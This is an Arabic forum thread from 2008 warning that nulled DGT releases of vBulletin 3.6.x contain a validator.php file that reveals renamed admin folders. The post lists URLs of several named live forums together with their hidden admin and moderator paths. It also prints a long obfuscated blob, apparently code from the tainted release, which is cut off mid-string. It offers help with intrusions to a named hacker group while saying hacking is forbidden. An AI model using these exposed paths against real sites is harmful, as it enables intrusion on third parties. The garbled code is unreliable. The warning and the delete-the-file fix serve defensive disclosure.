ثغره مصوره مع المثال ؟ اي عربي خذه نسخ من الخنزير هذا vBulletin.v3.6.x.PHP.NULL-DGT

كافي عذاب · 07 Jul 2008, 05:46 PM

ثغره تكشف لنا التغير لمجلدات الحمايه لمنتدى او موقع بسكربت DGT Release Checker
مكتشف الثغره : هايف السفراني
نوعه الثغره : DGT Release Checker
بنسخ الفريق !! لـ vBulletin.v3.6.x.PHP.NULL-DGT
برابط
validator.php
خطوره الثغره : خطره جدا جدا
+ فهي تخرج لنا التغيرات التى عملناها في المجلدات وتوضح لمتجسس بسهوله الدخول +
هذى روابط مختاره لنتعرف على ما تعرفنا له من تغير روابط سريه . شوفها
http://www.q8as.com/vb/admincp!$/calendarpermission.php
http://qlb-egy.com/vb/Qlb-KoL-MaSrY/accessmask.php
http://www.5jola.com/vb/tl4sacp/accessmask.php
http://www.lebcedar.com/vb/leb-cpanel/help.php
http://www.arabsys.net/vb/arabsysislam/adminlog.php
علشان متزعلون رابط لساحات العجمان هههههه
http://sahatalajman.com/vb/validator.php
http://sahatalajman.com/vb/modcp/announcement.php
http://sahatalajman.com/vb/install/wwwww

الترقيع لها : لا يوجد غير مسح الكود ورفع الرئيسيه
-_ صور مصوره لنوع الثغره لرئيه هنا _-

موقع سعودي مصابه بثغره بحمايه من vBSEO 3.1.0 KEYGEN ... BY
أسبابها النسخه واضحه لـ vBulletin.v3.6.x.PHP.NULL-DGT كمثال
بعض المنتديات عند رفع الرابط لـ validator.php
دخولها غير اللى بالقوس وتعرف على متغيراته ؟
تجد رابط تحميل له وهذى صوره مصوره

وارجوا من الجميع انهم ما يظلمني في الشرح فقط حبيت أوكد لكم الثغره بنوعها وخطورتها يمكن تقول غير خطره ..
وانا اقول خطره فقط بكشف التغيرات ويمكن الدخول تلقائي والتعرف على الثغره في وجود الحمايه لـ نوع لم اتعرف عليه لحد الان ما هي
بس احس الحمايه التركيه مصابنه لأنها ما تتصدي عن النسخه اللى فيها اكواد التجسس وتم تجربه حمايه الفريق الامني بنظافتها . بس في اشخاص مركبين دعايه لحمايه الفريق يعني عاملها يدويا ؟
azeC49Oj5hOw1WWmU5OXNIeC1XTUE9Oj5hOw1WWmU5OXNIeC08 Tz09T1k6PmE7DVZZZXp4c0g6PmE7DVYyT1dPejo+IzQ0NDQ0ND sNVjxlMnl4ek9RSDktMk9XT3o6PiNhYWFhYWE7DVZBT0g9LUFl WXNXcTovT1F6c016PkVNfSw+WU9IT25aZTJNOw1WbA1WPWU8V0 0+XQ1WPE96OU16Oj4wWlI+OWVuLk05PiNycnJycnI7DVZsDVY9 OT5dDVY8T3o5TXotPU9aOj4wWlI+OU89PU05PiM0NDQ0NDQ7DV ZBT0g9LW5zNU06MFtaUjsNVmwNVg1WDVYuaz5dDVYJPU1SPS1l V3N4SDo+Mk1IPU16Ow1WCUFPSD0tfU1zeC49Oj48T1c5Ow1WCV llenhzSC08Tz09T1k6PjBhWlI7DVZsDVZCaG49cVdNaQ1WQmgu TWU5aQ1WQjxPOXFpDVZCLmtpNENUPmdNV01lbk0+Ly5NMnlNek JoLmtpDVZCP1ouWg1Wc0E+KCFBc1dNX01Sc249bigkcnNXTUVl WU0pKT5dDVY+Pj4+WnpzSD0+KCJCLmtpL2VIPkhPPT49Tz5PWk 1IPkFzV00+JHJzV01FZVlNQi5raSIpOw1WPj4+Pk1Scz07DVZs DVZzQT4oWTlMX0FzV00oJHJzV01FZVlNKT4hUz5uPXo9T1dPfU 16KCQvLk0yeW5RWW5yc1dNdGVuLikpPl0NVj4+Pj5aenNIPT4o IkIua2lyc1dNPiRyc1dNRWVZTT4yT3p6UVo9TTlCLmtpIik7DV Y+Pj4+TVJzPTsNVmwNVg1WJC5lSDlXTT5TPkFPWk1IKCRyc1dN RWVZTSw+InoiKTsNVn0uc1dNPighQU1PQT4oJC5lSDlXTSkpPl 0NVj4+Pj4kV3NITT5TPj16c1koQXhNPW4oJC5lSDlXTSw+JFll UnU0TElzSE0pKTsNVj4+Pj5zQT4oJFdzSE0pPl0NVj4+Pj4+Pj 4+c0E+KG49eldNSCgkV3NITS:
غير موجوده بس مركبه

والقليل منها عليها الجدار الناري

والمنتدى المقفل من الزوار ويطلب منك التسجيل !شبه محميه بس عند تسجيلك شغاله بعضها وهذا طلب اخونا كافي عذاب .. وصاحب موقع اصحاب توب بالتعرف على وجودها او لا وتم التعرف على وجودها وهذى صوره لتأكد بس كل ما فيها محذوف : وعلى كلام اخونا كافي عذاب بانه يقول صاحب موقع اصحاب توب : يقول التعديل من الاخ شبح !! بالتعديل للمنتدى .. من الفريق الامني وانا اوجه له الشكر في التعديل الطيب نعم تعديل مميز
قبل
؟ ما يحتاجد الرفع
بعد

وهذى صوره بعده المواقع المصابه بالثغره
بحجم الصوره
0.98 MB
أضغط هنا او هنا
بما اني تعرفت ان فيه فريق لـ DGT
وانا اكتشفت الثغره بالصدفه في تفحص موقعنا من الاخطاء وجده هذا التجسس علني من النسخ لفريق المخادع ! بوجودها او لا اعرف قصده ؟
ومسارها في مجلد المنتدى العادي < بقالب في المجلد بما ذكرنا لكم اسمه
.... توضيح بسيط لمثال عند الدخول لاي منتدى
vb/validator.php
سوف نجد كلمات ملونه كتالي بجنب كل رابط
- Not our's بالون الاصفر
معناها ؟ ليس لدينا لل
- FAIL بالون الاحمر
معناها ؟ الفشل
- OK معروفه !!؟
- Deleted! معروفه

تاريخ الثغره : 19-4-2008
البحث القاتل بعض الشئ !!
checksums.md5

؟؟ تم التأكد من الثغره !! لان البعض والكثير يرفع الملف بأكملها ! هذا غلط
عند تحميل النسخه من عندهم
vBulletin.v3.6.4.PHP.NULL-DGT
vBulletin.v3.6.4.incl.KeyGen.PHP.NULL-DGT

الملفات التى بداخله
- license_agreement ويب
- vb3_readme ويب
- do_not_upload مجلد
- upload مجلد المنتدى
- vb3_readme تيكست
- file_id تيكست

عند دخول مجدل المنتدى كتالي
>>>> -DGT
نجد بداخله قالب
validator
وهو الخطئ بموضوعنا !! فحذفه لا يحصل مشاكل بالمنتدى
شوف اكواده

هذا ما حبيت أضيفه بعد ثعرف نوع الثغره المجهوله من اي ؟
رفع مجلد المنتدى لـ upload
بعد ما تخلص من من تغير اسمه وتعمل فحص وتنظيف ترفعه
والباقي تحفظه عندك بعدينن تحتاجه ؟
,, وكثير من الناس رفع ما وجده من قبل ! ويستاهلون ذكر طرحهم بعلم وجدها قبلهم بس التردد عندي خوف من عملها الهكر !! واكيد يعرفونها بمثل ما عرفناها لسيطره على الاجانب وهم العكس للأسف ؟ بهذى النسخ المصابه واليكم بعض النشر
تفصيح جميل من الشخص هنا
وهذا الشخص نزل الموضوع كفعل الخير بتحميلها ونبه مع الطرح حذفها هنا
وصل التنبيه من الاخ بس بعد مده هنا
الف شكرا لك اخي لم مسجل كنت جاوبتك بالمزيد هنا وبارك الله فيك
وغيرهم واجد
- فهذا السكربت مصاب بعد انتبهوا -
PhotoStore.v2.9.7.PHP.NULL-DGT
وكل خدماته مصابه لـ DGT
لا اعلم مقصوده او مرمجه بشغله ؟
وتوضيح " طريقه الاختراق للمنتديات ممنوعه ولا ارضي بطريقه شرحها واقول لربع اسف جدا على نشرها
وللاخ : هكركوز الكويت .. ابشر بسعدك بوجود اختراق اللى تبيه فقط وغيرها ممنوع نأسف منك ومن ربعك
وعمل الخير كنز _ وعمل الشر نار وأثم علينا
يرجاء ذكر المصدر شبكة الجميع

الآمل الطائر · 07 Jul 2008, 07:35 PM

بارك الله فيك ،،

كافي عذاب · 07 Jul 2008, 07:43 PM

وفيك البركه وتواصل طيب منك

الفتى الذهبي · 07 Jul 2008, 10:01 PM

يعطيك العافية

كافي عذاب · 08 Jul 2008, 09:23 AM

يعافيك والله يا الفتى الذهبي
التواصل لو بكلمه تكفي

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)